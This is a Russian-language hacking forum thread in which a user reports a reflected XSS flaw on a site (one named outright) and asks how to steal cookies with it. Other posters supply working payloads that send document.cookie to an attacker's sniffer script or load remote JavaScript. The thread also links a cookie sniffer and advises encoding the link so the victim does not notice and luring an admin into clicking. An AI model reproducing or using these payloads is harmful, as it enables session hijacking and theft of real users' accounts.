Здравствуйте. Вот нашёл на 1 сайте пассивную хсс ( /open.php?url='><script>alert(/xak/)</script> ) 1 Вопрос, что можно сделать имея её? Возможно как-то украсть куки, и что-то вроде? Заранее спасибо за ваши ответы.
Дать тому, у кого хочешь свистнуть куки, такую ссылку: /open.php?url='<script>window.location.href='http://твой_сайт/s.php?'+document.cookie;</script> где s.php - твой снифер
вот тебе мой снифер, может отправлять на почту, а может писать в файл. определяет некоторую инфу о юзере. http://depositfiles.com/files/d3gf1m5m9 p.s. лучше написать свой ява скрипт, и залить на свой сервер с снифером, ссылка будет лучше /open.php?url='<script src='http://www.blabla.ru/a.js'></script>
Просто видел у 1 человек нашёл пассивный хсс, и написал снифер вроде, и поставил его на хостинг, и когда заходиш на сайт http://тут его сайт.narod.ru то куки воруются у того сайта с пассивной хссшкой.
Возможно при условии, что юзер (админ) окажется лохом и кликнет по ссылке, которую ты ему пришлешь. Только ссылку, которую тебе дал Pashkela запиши в hex или криптани, а то так палевно слишком. Это либо активка была
Вот есть просто на сайте хсс пассивная вроде, http://freetmd.net/redir.php?url='><script>alert(/xak/)</script> Как тут куки своровать?( Просто тестировал над собой, и куки не присылалисЬ, присылалась только инфа а куки нет.
"Просто тестировал над собой" и что? Это должно мне о чем-то сказать? Например о том, что ты вообще понятие имеешь что такое снифер? И умеешь им ПРАВИЛЬНО пользоваться? Вот правильный снифер, которым, например, пользуюсь давно уже: Скачать снифер
Спасибо. Помог. Это типо нужно использовать так: /open.php?url='<script src='http://мой сайт/снифер/s.gif'></script> дык правильно?
Нет, неправильно. Читай МОИ посты в этой теме. Остальные требуют уже некого понимания сути XSS и навыков
/open.php?url='<script>window.location.href='http://твой_сайт/s.gif?'+document.cookie;</script> так значит?)